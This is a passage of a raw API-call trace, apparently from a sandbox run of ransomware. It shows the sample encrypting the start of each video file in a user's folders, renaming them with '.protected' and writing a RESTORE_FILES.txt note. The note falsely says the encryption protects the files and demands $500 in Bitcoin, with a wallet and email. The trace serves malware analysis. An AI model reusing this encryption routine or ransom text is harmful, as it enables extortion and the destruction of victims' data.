pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.053] StrStrIW (lpFirst="s_i2.avi", lpSrch=".protected") returned 0x0 [0093.053] lstrcmpW (lpString1="s_i2.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".txt") returned 0x0 [0093.054] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".rar") returned 0x0 [0093.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".zip") returned 0x0 [0093.054] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.055] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.055] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.055] CloseHandle (hObject=0x150) returned 1 [0093.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi.protected") returned 101 [0093.055] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi.protected")) returned 1 [0093.057] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Windows") returned -1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Program Files") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Program Files (x86)") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="$Recycle.bin") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="System Volume Information") returned 1 [0093.057] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrIW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".protected") returned 0x0 [0093.057] lstrcmpW (lpString1="tYbh0dSvbMUBd.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".txt") returned 0x0 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".rar") returned 0x0 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".zip") returned 0x0 [0093.057] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.058] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.058] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.058] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.059] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.059] WriteFile (in: 
hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.059] CloseHandle (hObject=0x150) returned 1 [0093.059] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi.protected") returned 110 [0093.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi.protected")) returned 1 [0093.060] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Windows") returned -1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Program Files") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Program Files (x86)") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="$Recycle.bin") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="System Volume Information") returned 1 [0093.060] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.060] StrStrIW (lpFirst="uwylcPm_.mp4", lpSrch=".protected") returned 0x0 [0093.060] lstrcmpW (lpString1="uwylcPm_.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0093.060] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".txt") returned 0x0 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".rar") returned 0x0 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".zip") returned 0x0 [0093.061] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.062] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, 
lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.062] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.062] CloseHandle (hObject=0x150) returned 1 [0093.062] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4.protected") returned 105 [0093.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4.protected")) returned 1 [0093.063] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.063] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\RESTORE_FILES.txt") returned 100 [0093.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.065] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.066] lstrlenA (lpString="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") returned 684 [0093.066] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.066] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.066] CloseHandle (hObject=0x14c) returned 1 [0093.067] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Windows") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Program Files") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Program Files (x86)") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="$Recycle.bin") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="System Volume Information") returned 1 [0093.067] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.067] StrStrIW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".protected") returned 0x0 [0093.067] lstrcmpW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="RESTORE_FILES.txt") returned 1 [0093.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) 
returned 1 [0093.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".txt") returned 0x0 [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".rar") returned 0x0 [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".zip") returned 0x0 [0093.068] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.069] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.069] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.069] CloseHandle (hObject=0x14c) returned 1 [0093.070] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv.protected") returned 90 [0093.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv.protected")) returned 1 [0093.070] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.070] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.071] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\RESTORE_FILES.txt") returned 79 [0093.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xd8 [0093.072] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.072] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.073] lstrlenA (lpString="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") returned 684 [0093.073] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
